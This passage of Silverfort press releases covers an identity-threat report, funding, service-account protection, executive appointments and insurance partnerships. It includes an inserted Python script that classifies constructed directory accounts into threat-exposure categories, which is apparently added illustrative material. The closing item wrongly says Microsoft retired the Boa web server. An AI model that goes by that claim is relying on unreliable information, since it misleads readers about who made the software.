- 13% of user accounts are categorized as "stale accounts," which are effectively dormant user accounts that the IT team may have forgotten. They are easy targets for lateral movement and evading detection by attackers.

Silverfort's research team has meticulously categorized Identity Threat Exposures (ITE) into four distinct classes. Their goal is to arm the cybersecurity industry with a framework to classify and understand the diverse spectrum of identity issues and misconfigurations that enable credential theft, privilege escalation, and lateral movement by malicious actors.

The four ITE categories:

- Password Exposers: Enable an attacker to discover users’ passwords by exposing the password hash to common compromise techniques. Examples include NTLM authentication, NTLMv1 authentication, and admins with SPN.
- Privilege Escalators: Allow an attacker to gain additional access privileges. Typically, Privilege Escalators are the result of a misconfiguration or insecure legacy settings. Examples include shadow admins and unconstrained delegation.
- Lateral Movers: Allow an attacker to move laterally undetected. Examples include service accounts and prolific users.
- Protection Dodgers: Potentially open legitimate user accounts up for attackers to use. Protection Dodgers stem from human error or mismanaged user accounts; they are not inherently security flaws or misconfigurations. Examples include new users, shared accounts, and stale users.

Join Silverfort’s identity threat experts on April 9th in partnership with Hacker News for a deep dive into the report findings. Visit Identity Underground to access the complete report.

### About Silverfort

Silverfort, the Unified Identity Protection company, pioneered the first and only platform that enables modern identity security everywhere. We connect the silos of enterprise identity infrastructure to unify identity security across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing every identity, and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, amongst others. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www.silverfort.com or on LinkedIn.
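To make the four ITE categories in the report summary above concrete for a posture review, here is an added example (not code from the report, and not Silverfort's platform or data model) that classifies a constructed set of directory account records into Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers, using the exposure examples the report lists for each category. The record layout, the sample accounts, and the thresholds for "stale", "new" and "prolific" accounts are assumptions made for this example; the only real directory value used is the Active Directory `userAccountControl` bit TRUSTED_FOR_DELEGATION (0x80000), which marks unconstrained delegation.

```python
"""Classify constructed directory account records into the four ITE categories.

Category names and exposure examples (NTLM/NTLMv1 use, admins with an SPN, shadow
admins, unconstrained delegation, service accounts, prolific users, new/shared/stale
users) follow the report summary. Everything else here is constructed for the example.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Set

# Real Active Directory userAccountControl bit: TRUSTED_FOR_DELEGATION
# (the account is configured for unconstrained Kerberos delegation).
UAC_TRUSTED_FOR_DELEGATION = 0x80000

# Thresholds assumed for this example; the report does not define them.
STALE_AFTER = timedelta(days=90)      # no logon for this long -> "stale user"
NEW_WITHIN = timedelta(days=7)        # created this recently -> "new user"
PROLIFIC_DESTINATIONS = 25            # more distinct targets than this -> "prolific user"


@dataclass
class Account:
    """One directory account plus facts derived from authentication logs (constructed layout)."""
    sam: str
    is_admin: bool = False                               # member of a built-in privileged group
    spns: List[str] = field(default_factory=list)        # servicePrincipalName values
    uac: int = 0                                         # userAccountControl bits
    ntlm_versions: Set[str] = field(default_factory=set) # e.g. {"NTLMv1"} seen in auth logs
    can_reset_passwords: bool = False                    # ACL right over other accounts, outside admin groups
    is_service_account: bool = False
    distinct_destinations: int = 0                       # hosts this account authenticated to
    shared: bool = False                                 # one credential used by several people
    last_logon: Optional[datetime] = None
    created: Optional[datetime] = None


def classify(acct: Account, now: datetime) -> Dict[str, List[str]]:
    """Map one account to {ITE category: [exposure, ...]}; an empty dict means no ITE found."""
    found: Dict[str, List[str]] = {}

    def add(category: str, exposure: str) -> None:
        found.setdefault(category, []).append(exposure)

    # Password Exposers: the password hash is exposed to common compromise techniques.
    if "NTLMv1" in acct.ntlm_versions:
        add("Password Exposers", "NTLMv1 authentication")
    elif acct.ntlm_versions:
        add("Password Exposers", "NTLM authentication")
    if acct.is_admin and acct.spns:
        add("Password Exposers", "admin with SPN")

    # Privilege Escalators: misconfiguration or insecure legacy settings.
    if acct.can_reset_passwords and not acct.is_admin:
        add("Privilege Escalators", "shadow admin")
    if acct.uac & UAC_TRUSTED_FOR_DELEGATION:
        add("Privilege Escalators", "unconstrained delegation")

    # Lateral Movers: accounts whose normal activity blends in with lateral movement.
    if acct.is_service_account:
        add("Lateral Movers", "service account")
    if acct.distinct_destinations > PROLIFIC_DESTINATIONS:
        add("Lateral Movers", "prolific user")

    # Protection Dodgers: human error or mismanaged accounts, not misconfigurations.
    if acct.shared:
        add("Protection Dodgers", "shared account")
    if acct.created is not None and now - acct.created <= NEW_WITHIN:
        add("Protection Dodgers", "new user")
    if acct.last_logon is not None and now - acct.last_logon >= STALE_AFTER:
        add("Protection Dodgers", "stale user")
    return found


def audit(accounts: List[Account], now: datetime) -> Dict[str, Dict[str, List[str]]]:
    """Classify every account and keep only those with at least one exposure."""
    results: Dict[str, Dict[str, List[str]]] = {}
    for acct in accounts:
        exposures = classify(acct, now)
        if exposures:
            results[acct.sam] = exposures
    return results


def sample_accounts(now: datetime) -> List[Account]:
    """Constructed sample directory for the demo; not real data."""
    d = timedelta
    return [
        Account("svc_backup", spns=["MSSQLSvc/db01:1433"], is_service_account=True,
                ntlm_versions={"NTLMv2"}, last_logon=now - d(days=1)),
        Account("da_jsmith", is_admin=True, spns=["HTTP/intranet"], last_logon=now - d(days=2)),
        Account("helpdesk7", can_reset_passwords=True, ntlm_versions={"NTLMv1"},
                last_logon=now - d(days=3)),
        Account("legacy_app", uac=UAC_TRUSTED_FOR_DELEGATION, last_logon=now - d(days=200)),
        Account("reception", shared=True, last_logon=now - d(days=1)),
        Account("new_hire", created=now - d(days=2), last_logon=now - d(days=1)),
        Account("ops_scanner", distinct_destinations=400, last_logon=now - d(days=1)),
        Account("clean_user", last_logon=now - d(days=1)),
    ]


def run_sample(now: Optional[datetime] = None) -> Dict[str, Dict[str, List[str]]]:
    """Audit the constructed directory at a fixed point in time so results are reproducible."""
    now = now or datetime(2024, 3, 26, tzinfo=timezone.utc)
    return audit(sample_accounts(now), now)


if __name__ == "__main__":
    for sam, categories in run_sample().items():
        for category, exposures in categories.items():
            print(f"{sam:12} {category:22} {', '.join(exposures)}")
```

Run as a script it prints one line per account and category; in a real review the `Account` records would be populated from the directory (group membership, `servicePrincipalName`, `userAccountControl`, ACLs) and from authentication logs (NTLM version, distinct destinations, last logon), and the category counts give the same kind of per-category prevalence figures the report presents.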
---

- Published: 2024-01-23
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-raises-116m-to-deliver-a-unified-layer-of-identity-security-across-all-enterprise-resources/

Following 100%+ year-over-year revenue growth, with 100+ customers added quarterly, including multiple Fortune 50 companies, Silverfort announces Series D funding, led by Brighton Park Capital

January 23, 2024 – Tel Aviv, Israel & Boston, MA – Silverfort, the leading identity protection company, today celebrates raising $116M in Series D funding, bringing the total amount raised to $222M. Brighton Park Capital (BPC) led the round, with participation from existing investors including Acrew Capital, Greenfield Partners, Citi Ventures, General Motors Ventures, Maor Investments, Vintage Investment Partners and Singtel Innov8. Mike Gregoire, founding Partner at BPC and former CEO of CA Technologies and Taleo, will join Silverfort's Board of Directors as the company scales and continues its journey to transform and lead the identity security market.

### 100%+ Year-Over-Year Growth, At Scale

The investment follows another record year of more than 100% growth where Silverfort added tens of millions in new Annual Recurring Revenue (ARR), and hundreds of new enterprise customers, including the largest global financial services, manufacturing and retail companies. Ranked as the #1 Best Startup Company to Work For in Israel for the second consecutive year, Silverfort intends to grow its global team, already located across more than 15 countries, and will use the additional funds to expand its platform with new innovative product modules and accelerate its go-to-market strategy with an emphasis on channel partnerships.

### Identity Is Every Attacker’s Weapon of Choice – And There’s a Reason

Compromised identities and credentials are the #1 tactic for cyber threat actors and ransomware campaigns to not only break into organizational networks, but to spread inside networks.
A core reason identity is the most vulnerable element in the enterprise attack surface is the market misperception that Identity and Access Management (IAM) providers—who are in charge of managing identities—are capable of securing identities. In reality, they are not in a position to secure identity effectively, due to two major limitations:

- The migration to hybrid and multi-cloud environments resulted in fragmented, complex enterprise environments: 92% of companies are forced to use a combination of cloud-native and on-prem identity solutions, often from multiple vendors. Each of these solutions operates as a ‘silo’, with its own local security controls, without understanding the broader context of the user’s activity and without any consistent enforcement across the organization.
- Many critical resources found at every company cannot be protected by IAM and identity security solutions. Resources such as command-line interfaces (used in most data breaches), legacy systems, service accounts (non-human identities), file shares and databases, IT/OT infrastructure, amongst others, are regularly used by attackers as the easiest way to access sensitive networks and avoid the existing security controls.

### Where No Identity Security Platform Has Gone Before

Silverfort spent years purposely designing its platform to eliminate the silos and blind spots that identity security has suffered from for many years, which no other solution has managed to address so far. The platform extends modern identity security measures to every enterprise resource, on-prem and in the cloud, including systems that no other solution can protect, in an effortless and instant manner. It enables Multi-Factor Authentication (MFA), Identity Threat Detection and Response (ITDR), Identity Security Posture Management (ISPM), and real-time protection for privileged users and service accounts—an attacker’s prime target.
By enabling these modern identity security controls holistically, even for previously unprotectable assets, customers are able to stop identity-based attacks everywhere (including by some of today’s most dangerous threat actors) and comply with regulations and cyber insurance requirements.

"Silverfort is one of the rare companies that has successfully envisioned how a large market will need to transform to solve a tough problem – in this case, identity security," said Mike Gregoire. "The company has a track record of building innovative products at scale that exceed customer expectations, combined with excellent go-to-market execution. Silverfort’s deep market expertise and vision for the identity security market, as well as their ability to build a winning team and culture, are second to none. We’re thrilled to join Hed, Yaron, and the rest of the Silverfort team on the next phase of their journey to not only reshape the identity security market but lead it.”

### Enabling Modern Security on Top of Every Authentication

With its patented technology, Silverfort connects to the entirety of an organization’s identity infrastructure in a matter of hours, from cloud-native identity providers (which are only aware of what happens inside their specific silo) to legacy on-prem directories such as Active Directory (which are missing basic security capabilities). Silverfort’s unique platform architecture:

- Serves as a centralized enforcement engine behind all identity infrastructure silos, and as a ‘second opinion’ behind the scenes to approve all access requests.
- Maps the company’s entire identity infrastructure, analyzes its security posture, inspects every access attempt across all environments in real time, and most importantly – enforces active inline policies to verify the user’s identity or to prevent unauthorized access.
- Operates in a way that is completely invisible to the countless devices, servers and applications that it protects, eliminating the need to modify them, integrate with them, or install anything on them. Organizations can protect every type of system, saving enormous time and cost.

“Identity has become the weakest link in enterprise security, and solving it requires a new approach – a unified, end-to-end layer of security that covers all the silos and blind spots of the identity infrastructure,” said Hed Kovetz, Silverfort’s Co-Founder and CEO. “We are very excited about our new partnership with BPC, which will allow us to accelerate our platform vision and strong business momentum. We look forward to reshaping the way identity security is done in every company, to effectively answer today’s and tomorrow’s cyber threats.”

Learn more about how Silverfort helps businesses protect identities with its unified identity protection platform.

### About Silverfort

Silverfort is the Unified Identity Protection company that pioneered the first and only platform enabling modern identity security everywhere. By connecting to the silos of the enterprise identity infrastructure, Silverfort unifies identity security across all on-prem and cloud environments. With its unique architecture and vendor-agnostic approach, Silverfort takes away the complexity of securing every identity, and extends protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, amongst others. Silverfort is a Top Tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. It’s trusted by hundreds of the world's leading enterprises, including multiple Fortune 50 companies, and has local teams in more than 15 countries. Learn more by visiting www.silverfort.com.

### About Brighton Park Capital

Brighton Park Capital is a Greenwich, Conn.-based investment firm focused on entrepreneur-led, growth-stage software, healthcare, and tech-enabled services companies. The firm invests in companies that provide highly innovative solutions in partnership with great management teams. Brighton Park brings purpose-built value-add capabilities that match the unique requirements of each of its companies. For more information about Brighton Park Capital, please visit www.bpc.com.

### Media Contacts

For Silverfort: Jill Creelman, Silverfort@inkhouse.com

For Brighton Park Capital: Jenny Gore/Julie Rudnick, FGS Global, BrightonPark@fgsglobal.com

---

- Published: 2023-12-19
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-first-to-deliver-automated-identity-protection-of-thousands-of-service-accounts-with-a-single-click-securing-machine-to-machine-communications/

Customers can now discover, monitor, and protect their service accounts with fully automated visibility, risk analysis, and adaptive access policies to bolster the protection of an entire class of identities that previously went unprotected.

Tel Aviv & Boston - Dec 18, 2023 — Silverfort, the Unified Identity Protection leader, announced today the first and only solution that provides customers with real-time protection and visibility of service accounts in a single click. Silverfort’s expanded Service Account Protection capabilities automate and scale the protection of thousands of service accounts with ease, removing burdensome roll-out processes to save time and cost. This solves a major blind spot in enterprise security that was, until now, extremely difficult to address, enabling organizations to mature their overall security program.

Service accounts are used for machine-to-machine communication to perform automatic, repetitive, and scheduled actions in the background, usually without administrator supervision or intervention.
Because there is no human attached to a service account, they cannot be protected with standard identity security controls such as Multi-Factor Authentication (MFA). Compounding the risk, service accounts are typically highly privileged accounts, giving access to highly critical systems. Based on a recent report by Osterman Research, only 4% of organizations claim to have full visibility into their service accounts. As we rely more and more on automated machine-to-machine communication and process automation, the number of unprotected service accounts continues to climb, giving attackers a bigger attack surface to target. According to Silverfort’s analytics, we’ve found that more than 60% of attacks leverage service accounts for lateral movement.

Silverfort’s Service Account Protection fully automates discovery and activity mapping, with newly detected service accounts protected within 30 minutes. Today, the company is adding the ability to dramatically scale protection with a single click and add immediate protection to new service accounts upon creation. Each service account’s activity is mapped, including the sources and destinations where it’s being used, establishing a baseline of normal behavior and identifying the service account's operational dependencies. Policies are auto-created to block access or alert on unauthorized activity. For those needing proof of service account protection for cyber insurance requirements, Silverfort provides detailed reports to help reduce insurance premiums.

“Service accounts are a security nightmare because you can’t put MFA on them, so you need to have other means of protection. Silverfort enabled us to put real-time protection on our service accounts by enforcing policies that block any access that deviated from normal behavior,” said Tom Parker, VP of IT and CISO of Kayak. “Because of this, even if attackers were able to compromise the credentials of service accounts, they wouldn’t be able to use them for malicious access.
Silverfort was able to protect what no one else could. Of the security tools we use, Silverfort has a very high return on investment.”

Silverfort’s Service Account Protection:

- Discovers and maps service accounts for complete visibility. Silverfort’s platform data shows that most companies have 30-40% more service accounts than previously thought. Unlike any other identity security solution on the market, Silverfort maps every service account, including ones that the organization didn’t know about, giving teams insight into the risk of every service account’s authentication and access activity.
- Delivers instant protection. Silverfort auto-generates tailored policies for every service account that trigger a protective action when the service account is being used outside of its intended purpose. Users can choose between blocking access and alerting or activating the policy. New service accounts added will be detected and protected within 30 minutes.
- Automates and scales service account protection. Customers can create global policies covering thousands of service accounts with a single click, including gMSA accounts.
- Requires NO agent or proxies. Silverfort simplifies the security of service accounts without the need to change applications, implement software agents or proxies, or make any password changes.

“Identity is the most exposed, vulnerable and targeted attack surface. Organizations rely on point solutions to secure identities, and still, many identities are left unprotected—this typically includes service accounts,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Silverfort prides itself on the ability to protect the unprotected, including service accounts in a non-intrusive way. Silverfort is able to close this gap by automatically discovering, analyzing and protecting all service accounts without having to modify them, solving massive challenges for organizations when it comes to securing their identity attack surface.
”

Silverfort is dedicated to protecting all identities—across the entire identity infrastructure—in a single solution, eliminating the need for point identity security solutions. 90% of businesses have hybrid environments, with on-prem and cloud-based infrastructure, and require a cross-platform solution that can provide visibility and protection of their entire hybrid environments. By being vendor agnostic, agentless, and combining visibility and protection into a single product, Silverfort is the only identity security platform that can protect all identities from a single, unified platform. Learn more about Silverfort’s Service Account Protection here.

### About Silverfort

Silverfort is the only Unified Identity Protection Platform that extends identity protection to any sensitive resource, including ones that couldn’t be protected before, without having to modify them. That includes legacy systems, command-line interfaces, IT/OT infrastructure, service accounts (non-human identities) and many more. Silverfort delivers secure authentication and access policies across the entire hybrid identity infrastructure – both legacy and modern – from a single unified platform, and stops identity-based threats everywhere. Silverfort is headquartered in Tel Aviv, Israel, and was founded in 2016.

---

- Published: 2023-09-06
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection/

Inaugural State of Identity Security report finds that 83% of organizations experienced an identity-related breach

Boston & Tel Aviv, Sept. 6, 2023 — Silverfort, the Unified Identity Protection Platform leader, today announced its identity protection annual research report titled, The State of Identity Security: Insights into Critical Protection Gaps.
Conducted by Osterman Research, the report finds the identity attack surface to be the most significant gap in cybersecurity resilience today, with existing solutions like multi-factor authentication (MFA) and privileged access management (PAM) leaving critical exposures and allowing for the malicious use of compromised credentials. The survey behind this report, which included 637 respondents in identity roles at organizations with at least 1,000 employees, was conducted between May and June 2023.

The research finds that more than four out of five organizations have experienced a breach that involved the use of compromised credentials, half of which happened in the past 12 months. Furthering the challenges for CISOs is a continual misalignment between security and identity teams. Visibility into the identity attack surface continues to be insufficient, leaving organizations exposed to bad actors who can gain access to their environments, move laterally inside their networks, and wreak havoc in minutes. The protection of the identity attack surface – which extends far beyond traditional identity access management tools – is the last line of defense in detecting and preventing such threats in real time.

Key takeaways of the report include:

- Identity is the new top attack surface: More than 80% of organizations have experienced an identity-related breach that involved the use of compromised credentials, half of which happened in the past 12 months.
- Sporadic and poorly deployed MFA and PAM solutions fail to deliver 360º protection: 65% of organizations have not implemented MFA comprehensively enough to provide sound protection. In addition, only 10% of organizations have fully deployed PAM and have high confidence in its ability to prevent malicious use of privileged credentials, due to the notorious complexity of implementing such solutions at scale.
- Limited visibility is creating ‘blind spots’ and exposed access points for bad actors: 94% of organizations do not have full visibility into their service accounts (non-human identities), making these highly vulnerable and often privileged identities a prime target for attackers.
- Real-time protection is missing: 78% of organizations admit that they cannot prevent the misuse of service accounts in real time, due to low visibility and inability to enforce MFA or PAM protection.
- Organizations are more exposed than ever: Only one in five organizations are highly confident that they could prevent identity threats. Very few organizations are confident they can stop malicious access or lateral movement using compromised credentials.

“Today’s organizations are challenged with securing many different ‘silos’ of digital identity across complex hybrid and multi-cloud environments. Each of these environments has different identity security controls, which don’t work together and result in partial security, inconsistent user experience, and redundant costs,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “In addition, some of the most critical systems in every company don’t have identity security available at all, and bad actors know it. This new research emphasizes that organizations need to rethink how they implement identity security, and develop a strategy that covers the entire identity attack surface – including human and non-human identities, privileged and non-privileged users, on-prem and cloud environments, IT and OT infrastructure, and many other areas that they didn’t previously manage to protect.”

For other valuable research information, download the full report here.

### About Silverfort

Silverfort is the leader in Unified Identity Protection, enabling secure authentication and access across all corporate resources, both on-premises and in the cloud, to detect and stop identity-based attacks, including account takeover and ransomware spread.
Using patented technology, Silverfort enforces its protection as a layer on top of the customer’s existing IAM infrastructure without requiring modifications to endpoints, servers, or applications—a capability which is unmatched in the market. This includes resources that couldn’t be protected before, such as legacy applications, command-line interfaces, industrial systems, machine-to-machine access, and more. Silverfort is trusted by hundreds of enterprise customers around the world, including Fortune 100 companies. For more information, visit www.silverfort.com.

---

- Published: 2023-03-20
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-recognized-microsoft-security-excellence-awards-finalist-zero-trust-champion-security-isv/

Boston & Tel Aviv, March 20, 2023 — Silverfort, the leader in Unified Identity Protection, today announced it is a Zero Trust Champion and Security ISV of the Year award finalist in the Microsoft Security Excellence Awards. The company was honored among a global field of industry leaders that demonstrated success across the security landscape during the past 12 months.

“Being selected as a finalist is great validation of everything the team has achieved over the last year,” said Hed Kovetz, CEO and Cofounder, Silverfort. “Working together with Microsoft, we are enabling an increasing number of organizations globally to secure the blind spots in identity, and it is an honor for this to be recognized.”

At the Microsoft Security Excellence Awards on April 24, 2023, Microsoft will celebrate finalists in 11 award categories honoring partner trailblazers, solution innovators, customer and technology champions, and changemakers. This is the fourth year Microsoft is recognizing partners for their outstanding work in the security landscape.
All finalists are members of the Microsoft Intelligent Security Association (MISA), an ecosystem of independent software vendors (ISVs) and managed security service providers (MSSPs) that have integrated their security products and services with Microsoft’s security technology.

“I’m very pleased to extend my warmest congratulations to this year’s finalists for the Microsoft Security Excellence Awards. These are presented each year to recognize the outstanding achievements of our Microsoft Intelligent Security Association members as they improve customers' ability to identify and respond to security threats. Our community is made up of the most reliable and trusted security vendors worldwide. This year we received hundreds of quality submissions from partners and Microsoft stakeholders, so this year's finalists stood out in a crowd of exceptional talent. It’s my pleasure to acknowledge and celebrate their work over the past year,” said Maria Thomson, Microsoft Intelligent Security Association Lead.

MISA was established to bring together Microsoft leaders, ISVs, and MSSPs to work together to defeat security threats and make the world a safer place. The industry veterans in MISA and Microsoft will vote to select the winners of the Microsoft Security Excellence Awards, providing an opportunity for colleagues to honor their peers for delivering exceptional work to our shared customers.

---

- Published: 2023-03-16
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/cbs17-scammers-are-using-the-svb-collapse-to-steal-identities/

Our Co-Founder and CTO, Yaron Kassner, talks to CBS17 about how businesses can protect themselves from attacks taking advantage of Silicon Valley Bank's recent collapse. Watch the feature here: https://www.cbs17.com/news/investigators/watch-out-scammers-are-using-the-silicon-valley-bank-collapse-to-steal-identity/

---

- Published: 2023-03-08
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-introduces-five-senior-appointments/

Unified Identity Protection leader continues its fast growth, with 50% of all executive team positions now held by women.

Boston & Tel Aviv, Wednesday March 8th, 2023 - Silverfort, the leader in Unified Identity Protection, today introduces five new senior executive team members as it continues to strengthen go-to-market, finance, product, and customer success functions to support strong global growth, following a record year in which the company almost tripled its revenues. The appointments include new leaders as well as internal promotions and underline the company’s dedication to encouraging a diverse workforce, with over 15 female managers hired or promoted into management over the last year, and with women now representing almost 40% of all managerial roles and 50% of the Senior Management Team.

The new and promoted members of Silverfort’s executive team and their respective positions are as follows:

### Michelle Wideman, Chief Customer Officer

Michelle will oversee Silverfort’s Customer Success and Support teams, optimizing the customer journey to help them realize the full value of Unified Identity Protection. More than 20 years’ experience, including Chief Customer Officer roles at companies such as Dell Boomi and Onna, have seen her receive accolades from organizations such as PartnerHacker and Customer Success Collective. She is also a Distinguished Alumna at Elon University.

### Tarah Cammett, Chief Marketing Officer

With 23 years’ technology marketing experience at companies such as Carbon Black and Immersive Labs, Tarah brings brand, demand generation and global sales support together with empathic leadership to drive growth.
Based in Silverfort’s Boston office, she was recognized as one of the Top 25 Women Leaders in Cybersecurity in 2021 by The Software Report.

Irena Meaden, Chief Financial Officer

Newly promoted CFO Irena brings over 20 years in economics, corporate finance, risk, and business management. With previous roles at organizations spanning from Bank of Israel and AIG to fast-growth startups, she is well positioned to help Silverfort steer a sustainable and effective path to growth.

Revital Aronis, VP of Product Management

Newly promoted VP of Product Management, Revital, will oversee the continual evolution of Silverfort’s Unified Identity Protection platform. Starting her career at Israel’s elite 8200 Unit, and previously at Illusive Networks, her 15 years’ experience will help the company continually augment the platform to help customers address identity security risks using innovative technology.

Leslie Bois, VP of Global Channels

A regular fixture on the CRN Channel Chiefs list, Leslie will be responsible for executing and accelerating Silverfort’s global channel strategy. Drawing on experience as Vice President of Global Channels and Alliances at Veracode and Kaspersky Lab, she will be responsible for putting in place a channel-first strategy to help Silverfort scale globally through a balanced ecosystem of partners.

Liat Gavrieli, VP of HR at Silverfort, said “We are excited to have such talented leaders join our team or get well-deserved promotions, and we are also proud to see that by building a culture which selects the best people for the job, diversity has naturally taken root.

“International Women’s Day gives us the perfect opportunity to shine a light on how this approach has helped us organically build a strong and effective team with a high percentage of senior female leaders, who are so good at what they do. I look forward to working alongside the entire Senior Management Team as we continue to grow globally as a leader in Unified Identity Protection.”

More details on careers at Silverfort can be found on the website.

---

- Published: 2023-02-21
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/john-paul-cunningham-joins-silverfort-as-ciso/

Career CISO with experience working for organizations such as Bank of Hope and J.P. Morgan Asset Management joins Unified Identity Protection leader

Boston & Tel Aviv, 21 February, 2023 - Silverfort, a leader in Unified Identity Protection, today announced the appointment of John Paul Cunningham as Chief Information Security Officer. With over 24 years’ experience managing cyber risk at Fortune 100 companies - and another 8 years in the Fortune 1000 - John Paul will work with customers and partners to build an understanding of the strategic benefits of modern identity protection. In addition, he will also design and implement Silverfort’s own cybersecurity program.

In his previous role as CISO at Bank of Hope, John Paul was responsible for working with the board to build operating models designed to reduce cost and cyber risk, while also adhering to rigorous compliance standards. Prior to this, he held similar positions at Docupace, Ares Management and J.P. Morgan Asset Management building information security, risk management, and security operations programs from scratch.

“Silverfort has built a unique proposition which not only has immediate tactical use, enabling MFA to protect resources such as Command Line Interfaces and ICS systems with MFA for example, but also has far-reaching strategic benefits. Improving identity security posture has the potential to reduce a significant portion of risk, while also streamlining cost and complexity,” said John Paul Cunningham, Chief Information Security Officer, Silverfort. “For too long organizations have relied on a narrow, piecemeal approach to identity security. Silverfort is changing this - so it’s exciting to be a part of a team taking this to market,” he added.
“It’s a privilege to have a seasoned operator such as John Paul join the growing team at Silverfort,” said Hed Kovetz, CEO, Silverfort. “His experience operating at a senior level within large organizations will help us as we continue pushing into a greater number of enterprise environments. John-Paul’s background building risk management programs will also be invaluable as we scale our own security operations.”

Silverfort extends modern identity security to the sensitive resources targeted by attackers, including those which couldn’t be protected previously, such as legacy applications, command line interfaces, service accounts and more. For more information, visit www.silverfort.com

---

- Published: 2023-02-02
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-launches-free-identity-risk-assessment/

Thursday 2 February 2023, Boston and Tel Aviv: Unified Identity Protection leader, Silverfort, today launched the most comprehensive free cyber insurance assessment available to help organizations discover the gaps and hygiene issues in their identity attack surface which may cause cyber insurance compliance failures. Intended to be used by companies with 250 or more employees, the assessment will help meet expanding cyber insurance requirements in advance of a policy application or renewal.

Simple to deploy and providing visibility into all user authentications, Silverfort’s identity risk assessment operates at a directory level to report with in-depth visibility on the identity attack surface. The report summarizes risky user accounts and authentications as well as risk indicators such as shadow admins, passwords that never expire, admins liable to Kerberoasting, pass-the-ticket and lateral movement attempts, authentications using weak encryption protocols, unprotected Service Accounts and more.
These common attack paths are used by threat actors to move laterally around an organization and propagate the ransomware responsible for more than half of all cyber insurance payouts last year. For this reason, identity security hygiene has become increasingly important to insurance underwriters.

Cyber insurance premiums continue to increase due to the routine manner by which adversaries use these gaps in identity to spread in their victim’s environment and ultimately extort them for payment. In response, insurance carriers and brokers have added detailed identity security requirements and increased scrutiny around how controls are deployed and managed. MFA is now required to protect an expanded range of internal apps, interfaces, and systems, including VPNs, file shares, networking equipment, legacy systems, and CLI admin tools. Insurers are also increasing Privileged Access Management (PAM) requirements for highly privileged and non-human users, with the discovery and password hygiene of Service Accounts coming under particular scrutiny.

Hed Kovetz, CEO and Co-Founder of Silverfort, said, “Insurance carriers are waking up to the path of least resistance presented by the identity-based attack surface. Once initial compromise is achieved, countless attack paths into critical areas of every environment are exposed, significantly increasing the chance of an attack succeeding. This makes it very difficult for insurers to correctly price the risk.

“Our free identity risk assessment provides organizations a clear view of their exposure. With the results they can better understand the steps necessary to improve security posture and insurability, such as applying MFA to critical resources and protecting Service Accounts. We hope this helps put more affordable insurance policies in reach of more organizations.”

The free assessment is part of a broader program to improve the identity security maturity of organizations for insurance compliance attestation.
Major brokers such as Acrisure, Howden Group and other insurance carriers and intermediaries are now offering Silverfort’s Unified Identity Protection solution to help more customers qualify for cyber insurance policies.

To request an assessment, simply register on the Silverfort website and a representative will be in touch to assist.

---

- Published: 2022-12-12
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/howden-group-simplifies-cybersecurity-insurance-compliance-with-silverfort/

Partnership enables international broker to offer customers in 45 countries effortless deployment of MFA on previously ‘unprotectable’ resources and automated protection for Service Accounts

Monday 12 December 2022, Tel Aviv and London: International insurance broker, Howden Group, and Unified Identity Protection leader, Silverfort, today announced a partnership to make it easier for organizations to comply with the increasingly strict identity security controls now being required in cyber insurance policies.

With attackers taking advantage of narrowly deployed MFA solutions, and a lack of protection for non-human identities (Service Accounts) to spread ransomware, steal data and compromise critical systems, the cost of cybersecurity insurance policies has been increasing and exclusions have become stricter. To counter this, many carriers are now mandating identity security controls with greater breadth and depth.

The partnership seeks to address this compliance need by offering Silverfort’s Unified Identity Protection solution. This will enable Howden Group’s global customer-base to extend MFA to all their sensitive resources, including previously ‘unprotectable’ ones such as legacy applications and directories, Command Line Interfaces and other admin access tools, network infrastructure, industrial OT systems and more, without the need to modify these systems.
It also allows customers to discover, monitor and secure the automated Service Accounts often used by attackers in lateral movement - quickly and easily.

Howden Group’s Global Head of Cyber Insurance, Shay Simkin, said, “As a group, we are dedicated to helping our customers get the most out of their cybersecurity insurance policy, which puts a responsibility on them to reach a certain level of maturity.

“Silverfort helps our customers achieve this by vastly reducing the identity attack surface, with MFA on all internal resources and protection for Service Accounts, all without having to go through a long and expensive deployment process. This reduces a large swathe of risk that would otherwise lead to successful ransomware attacks, data breaches and significant disruption.”

As a large global broker with around $30bn in Gross Written Premiums, Howden Group helps insure some of the largest organizations in the world. Silverfort will be offered to the company’s customer-base alongside a set of complementary products designed to prevent a wide range of risks, including endpoint protection, security awareness training and more.

Hed Kovetz, CEO & Co-Founder of Silverfort, said “Organizations often assume their existing identity controls are sufficient to comply with cyber insurance policies, however this is not always the case. Closing the gaps in MFA coverage and protecting privileged users and non-human identities are increasingly cited by insurance carriers as mandatory – but are often too difficult for customers to implement quickly enough.

“Thanks to Silverfort’s unique technology which doesn’t require any changes to the customer’s systems, we already help hundreds of companies to fully meet these requirements, with a deployment time measured in hours, rather than months. We look forward to helping Howden Group customers fix this problem, quickly and easily.”

For more information about Silverfort and Howden's partnership, visit this page.
---

- Published: 2022-12-06
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/security-boulevard-flaw-in-aged-boa-web-server-threatens-supply-chain/

Microsoft may have retired the Boa web server in 2005, but that hasn’t stopped widespread use—and now the company is saying a vulnerability in the server’s open source component has been exploited by bad actors, targeting the energy industry and underscoring the continued vulnerability of the supply chain.

